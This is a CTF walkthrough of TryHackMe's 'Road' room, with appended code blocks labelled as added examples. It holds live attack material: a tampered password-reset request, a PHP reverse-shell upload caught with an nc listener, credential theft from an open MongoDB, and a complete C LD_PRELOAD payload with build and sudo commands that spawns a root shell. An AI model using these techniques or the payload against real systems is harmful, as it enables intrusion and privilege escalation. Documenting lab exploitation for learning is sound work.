28 November 2021 / TRYHACKME, CTF, MEDIUM

# Road Write Up

## Overview

Road is a medium-rated CTF room on TryHackMe created by StillNoob. Although rated medium I would put it down as easy, as the *cough* road is nicely laid out for you.

## Nmap

I started an nmap scan to check for available ports.

```
└──╼ $sudo nmap -sC -sV -oA nmap/initial 10.10.149.149
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-29 09:52 GMT
Nmap scan report for 10.10.149.149
Host is up (0.055s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e6:dc:88:69:de:a1:73:8e:84:5b:a1:3e:27:9f:07:24 (RSA)
|   256 6b:ea:18:5d:8d:c7:9e:9a:01:2c:dd:50:c5:f8:c8:05 (ECDSA)
|_  256 ef:06:d7:e4:b1:65:15:6e:94:62:cc:dd:f0:8a:1a:24 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sky Couriers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.04 seconds
```

Two ports are open:

- 22 - SSH - OpenSSH 8.2p1
- 80 - HTTP - Apache httpd 2.4.41

I ran a second nmap scan against all ports, but nothing else was open.

## Enumeration

Taking a look at the web server shows a simple courier web page. I tested the track order search but it didn't do anything, so I moved on and clicked Merchant Central, which took me to a login form. I tried a few common credential combinations with no joy, so I registered my own account.

Once in I had access to a static dashboard; none of the links on the left worked other than 'ResetUser'. However, I could view my profile. The only option available there was to upload an image, but this can only be done by the admin. The profile page does give me the admin's email address, though, so I might be able to use the ResetUser function to reset the admin's password.
On the ResetUser page the username field is greyed out, but I entered a new password and opened Burp. With Intercept on I submitted the request. In Burp I could see my own account name in the request body and nothing tying it to my session. I changed the username to the admin account and forwarded the request. The server resets the password of whichever username the client supplies, so I now have access to the admin account!

## Initial Access

Now that I have access to the admin account I should be able to upload a file. The site is using PHP, so I tried uploading a PHP reverse shell. I copied a PHP reverse shell to my working directory and edited the IP and port.

```
└──╼ $cp /usr/share/webshells/php/php-reverse-shell.php .
┌─[daz@parrotos]─[~/Documents/TryHackMe/Road]
└──╼ $mv php-reverse-shell.php shell.php
```

I then uploaded the file and started a listener:

```
└──╼ $nc -nvlp 4444
listening on [any] 4444 ...
```

The profile picture (top right) hadn't changed and no error was shown, so I inspected the element to find the src reference. My upload is not in the assets folder. However, the source of the profile page, `http://10.10.149.149/v2/profile.php`, contains a comment with a path for profile images. The first time I scanned the source I missed the comment; piping curl into grep is a quick and crude way of pulling all the comments off a page, which is useful on a large page.

```
└──╼ $curl -s http://10.10.149.149/v2/profile.php | grep '<!--'
<!--<link rel="stylesheet" href="../assets/css/bootstrap.min.css" crossorigin="anonymous">-->
<!-- <script src="/assets/js/dataTable.min.js"></script> -->
<!-- <div class="alert alert-danger">Take action</div> -->
<!-- </ul> -->
<!-- /v2/profileimages/ -->
<!-- Include Required Prerequisites -->
<!-- Include Date Range Picker -->
```

Note that grep only prints the line on which a comment opens, so a comment spanning several lines is only shown in part; it was enough here. Going to the path, directory listing is enabled so I can see the images, but I know I named my file shell.php, so I navigate straight to `http://10.10.149.149/v2/profileimages/shell.php`. The upload kept its .php extension and the directory executes PHP, so the shell fires. I have a shell!
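The `curl | grep '<!--'` one-liner only shows the line on which a comment opens, so a hint sitting on the second line of a multi-line comment never appears. The scanner below is an added example written for this write-up, not code from the original post or from the room; it walks the whole response body and returns each comment in full. The sample page it runs on is constructed here to mirror the profile.php comments quoted above (the TODO comment in it is invented for the example).

```c
/* Added example, not part of the original write-up: pull every HTML comment
 * out of a page body, including comments that span several lines, which a
 * `curl -s URL | grep '<!--'` one-liner only shows the first line of. */
#include <stddef.h>
#include <string.h>

/* Constructed sample body standing in for `curl -s .../v2/profile.php`.
 * The TODO comment is invented for the example; the other two mirror the
 * real page's comments. */
static const char SAMPLE_PAGE[] =
    "<html><head>\n"
    "<!--<link rel=\"stylesheet\" href=\"../assets/css/bootstrap.min.css\" crossorigin=\"anonymous\">-->\n"
    "</head><body>\n"
    "<!-- TODO:\n"
    "     move uploads out of the web root\n"
    "-->\n"
    "<ul>\n"
    "<!-- /v2/profileimages/ -->\n"
    "</ul></body></html>\n";

static int is_ws(char c) { return c == ' ' || c == '\t' || c == '\r' || c == '\n'; }

/* Locate comment number idx (0-based). On success *body/*len describe the
 * contents between <!-- and --> with surrounding whitespace trimmed and the
 * function returns 1. Returns 0 when there are fewer comments; an
 * unterminated <!-- is not counted as a comment. */
int nth_comment(const char *html, int idx, const char **body, size_t *len) {
    const char *p = html;
    for (int n = 0;; n++) {
        const char *open = strstr(p, "<!--");
        if (open == NULL) return 0;
        const char *start = open + 4;
        const char *close = strstr(start, "-->");
        if (close == NULL) return 0;
        if (n == idx) {
            const char *end = close;
            while (start < end && is_ws(*start)) start++;
            while (end > start && is_ws(end[-1])) end--;
            *body = start;
            *len = (size_t)(end - start);
            return 1;
        }
        p = close + 3;
    }
}

/* Number of well-formed comments in the body. */
int count_comments(const char *html) {
    const char *b; size_t l; int n = 0;
    while (nth_comment(html, n, &b, &l)) n++;
    return n;
}

/* 1 if comment idx, trimmed, is exactly `expected`, else 0. */
int comment_equals(const char *html, int idx, const char *expected) {
    const char *b; size_t l;
    if (!nth_comment(html, idx, &b, &l)) return 0;
    return strlen(expected) == l && memcmp(b, expected, l) == 0;
}

/* Index of the first comment that looks like a server path (starts with '/'),
 * the kind of hint worth trying in the browser; -1 if there is none. */
int first_path_hint(const char *html) {
    const char *b; size_t l;
    for (int n = 0; nth_comment(html, n, &b, &l); n++)
        if (l > 0 && b[0] == '/') return n;
    return -1;
}

/* Run the scanner over the constructed sample page. */
int demo_path_hint(void) { return first_path_hint(SAMPLE_PAGE); }
```

With a small main() that reads the curl output from stdin into a buffer, the same functions run over the real profile page; first_path_hint() picks out the /v2/profileimages/ style comment while the multi-line TODO, which grep would have truncated, comes back whole from nth_comment().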
```
connect to [10.8.21.217] from (UNKNOWN) [10.10.149.149] 59984
Linux sky 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 10:20:14 up 32 min,  0 users,  load average: 0.00, 0.02, 0.12
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
```

## Priv Esc 1

I have a shell as www-data. I can use it to grab the user.txt flag, which is world-readable, but I now need a way to become the webdeveloper user.

```
$ whoami
www-data
$ cd /home/
$ ls
webdeveloper
$ cd webdeveloper
$ ls -lah
total 36K
drwxr-xr-x 4 webdeveloper webdeveloper 4.0K Oct  8 10:59 .
drwxr-xr-x 3 root         root         4.0K May 25  2021 ..
lrwxrwxrwx 1 webdeveloper webdeveloper    9 May 25  2021 .bash_history -> /dev/null
-rw-r--r-- 1 webdeveloper webdeveloper  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 webdeveloper webdeveloper 3.7K Feb 25  2020 .bashrc
drwx------ 2 webdeveloper webdeveloper 4.0K May 25  2021 .cache
drwxrwxr-x 3 webdeveloper webdeveloper 4.0K May 25  2021 .local
-rw------- 1 webdeveloper webdeveloper   51 Oct  8 10:59 .mysql_history
-rw-r--r-- 1 webdeveloper webdeveloper  807 Feb 25  2020 .profile
-rw-r--r-- 1 webdeveloper webdeveloper    0 Oct  7 17:53 .sudo_as_admin_successful
-rw-r--r-- 1 webdeveloper webdeveloper   33 May 25  2021 user.txt
```

Two things in that listing are worth noting: `.sudo_as_admin_successful` means webdeveloper has run sudo successfully at some point, and `.mysql_history` is mode 600 so www-data cannot read it. I enumerated the box further and took a look at the listening ports, where I found MongoDB listening on 27017.
```
$ ss -tulp
Netid State  Recv-Q Send-Q       Local Address:Port   Peer Address:Port Process
udp   UNCONN 0      0            127.0.0.53%lo:domain      0.0.0.0:*
udp   UNCONN 0      0       10.10.149.149%eth0:bootpc      0.0.0.0:*
tcp   LISTEN 0      511              127.0.0.1:9000        0.0.0.0:*
tcp   LISTEN 0      4096             127.0.0.1:27017       0.0.0.0:*
tcp   LISTEN 0      151              127.0.0.1:mysql       0.0.0.0:*
tcp   LISTEN 0      4096         127.0.0.53%lo:domain      0.0.0.0:*
tcp   LISTEN 0      128                0.0.0.0:ssh         0.0.0.0:*
tcp   LISTEN 0      70               127.0.0.1:33060       0.0.0.0:*
tcp   LISTEN 0      511                      *:http              *:*
tcp   LISTEN 0      128                   [::]:ssh            [::]:*
$
```

MongoDB (27017), MySQL (3306 and 33060) and a service on 9000 are all bound to loopback only, which is why the initial scan never saw them. The mongo shell connects to the local instance without any credentials, and in the `backup` database I found the webdeveloper credentials. I've redacted the password in the output below.

```
$ mongo
MongoDB shell version v4.4.6
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("0ad03a25-0c2d-4c46-8adf-bb97086a2f15") }
MongoDB server version: 4.4.6
show dbs
admin   0.000GB
backup  0.000GB
config  0.000GB
local   0.000GB
use backup
switched to db backup
show collections
collection
user
db.user.find()
{ "_id" : ObjectId("60ae2661203d21857b184a76"), "Month" : "Feb", "Profit" : "25000" }
{ "_id" : ObjectId("60ae2677203d21857b184a77"), "Month" : "March", "Profit" : "5000" }
{ "_id" : ObjectId("60ae2690203d21857b184a78"), "Name" : "webdeveloper", "Pass" : "" }
{ "_id" : ObjectId("60ae26bf203d21857b184a79"), "Name" : "Rohit", "EndDate" : "December" }
{ "_id" : ObjectId("60ae26d2203d21857b184a7a"), "Name" : "Rohit", "Salary" : "30000" }
exit
bye
Error saving history file: FileOpenFailed Unable to open() file /var/www/.dbshell: Permission denied
$
```

The same password is reused for the Linux account, so I can now SSH in to the machine as webdeveloper.

```
└──╼ $ssh webdeveloper@10.10.149.149
The authenticity of host '10.10.149.149 (10.10.149.149)' can't be established.
ECDSA key fingerprint is SHA256:zSoCEcBBY73hNL9ItPA4CnB/405/W6GQYsl94qRMkOo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.149.149' (ECDSA) to the list of known hosts.
```
```
webdeveloper@10.10.149.149's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 29 Nov 2021 10:26:45 AM UTC

  System load:  0.0                Processes:             121
  Usage of /:   60.0% of 9.78GB    Users logged in:       0
  Memory usage: 63%                IPv4 address for eth0: 10.10.149.149
  Swap usage:   0%

185 updates can be installed immediately.
100 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Oct  8 10:52:42 2021 from 192.168.0.105
webdeveloper@sky:~$
```

## Priv Esc 2

Once connected as webdeveloper I ran `sudo -l`. There is a binary the user can run as root without a password, which could be vulnerable in itself, but the Defaults line also carries `env_keep+=LD_PRELOAD`, which is a privilege escalation path on its own: sudo passes LD_PRELOAD through to the root process, and the dynamic loader maps whatever shared object it names before the target binary's own code runs.

```
webdeveloper@sky:~$ sudo -l
Matching Defaults entries for webdeveloper on sky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User webdeveloper may run the following commands on sky:
    (ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility
webdeveloper@sky:~$
```

The article at Hacking Articles gives a great step-by-step on exploiting this. I created the shell.c file as per the article, compiled it as a shared object and ran the sudo command with LD_PRELOAD pointing at it to become root!

```
webdeveloper@sky:/tmp$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
webdeveloper@sky:/tmp$ sudo LD_PRELOAD=/tmp/shell.so /usr/bin/sky_backup_utility
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#
```

It does not matter what sky_backup_utility actually does: the preloaded library's initialiser runs before the binary's main() is reached, so any NOPASSWD entry combined with env_keep+=LD_PRELOAD gives the same result.

Thanks for reading!

Any comments or feedback welcome! You can find me on twitter.
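For completeness, here is an LD_PRELOAD payload for the Priv Esc 2 step. It is an added example written for this write-up, not the shell.c from the Hacking Articles post the write-up followed (that one defines `_init` and therefore needs the `-nostartfiles` flag seen in the gcc line above; this one uses a constructor attribute and builds with a plain `gcc -fPIC -shared -o shell.so shell.c`). The guard function is assumed, added so the object stays inert unless it really has been preloaded into a root process.

```c
/* Added example, not the original write-up's shell.c: a minimal LD_PRELOAD
 * payload for a sudo configuration with env_keep+=LD_PRELOAD plus a NOPASSWD
 * binary. Build:  gcc -fPIC -shared -o shell.so shell.c
 * Run:            sudo LD_PRELOAD=/tmp/shell.so /usr/bin/sky_backup_utility
 */
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Decide whether to fire (assumed helper, not part of the classic payload).
 * The shell is spawned only when this object has genuinely been injected via
 * LD_PRELOAD into a process that is already effective-uid 0; loaded any other
 * way (a test harness, a curious dlopen) it does nothing. */
int should_escalate(uid_t euid, const char *ld_preload) {
    return euid == 0 && ld_preload != NULL && ld_preload[0] != '\0';
}

static void spawn_root_shell(void) {
    /* Drop LD_PRELOAD first: otherwise every child of the shell (id, ls, ...)
     * re-loads this object and spawns yet another shell, recursively. */
    unsetenv("LD_PRELOAD");
    /* Make real, effective and saved ids all 0 so nothing downstream
     * (a shell that resets euid to uid, for instance) drops privilege. */
    if (setgid(0) != 0 || setuid(0) != 0)
        return;
    /* Hand over to an interactive shell. When it exits we leave instead of
     * returning into sky_backup_utility, so no unknown code runs as root. */
    if (system("/bin/sh") == -1)
        _exit(1);
    _exit(0);
}

/* Runs when the loader maps this object, i.e. before the target's main(). */
__attribute__((constructor))
static void preload_entry(void) {
    if (should_escalate(geteuid(), getenv("LD_PRELOAD")))
        spawn_root_shell();
}
```

Two details are easy to get wrong in hand-rolled versions of this: forgetting `unsetenv("LD_PRELOAD")`, which makes every command typed in the new shell spawn a further shell, and compiling without `-fPIC -shared`, which produces something the loader cannot map.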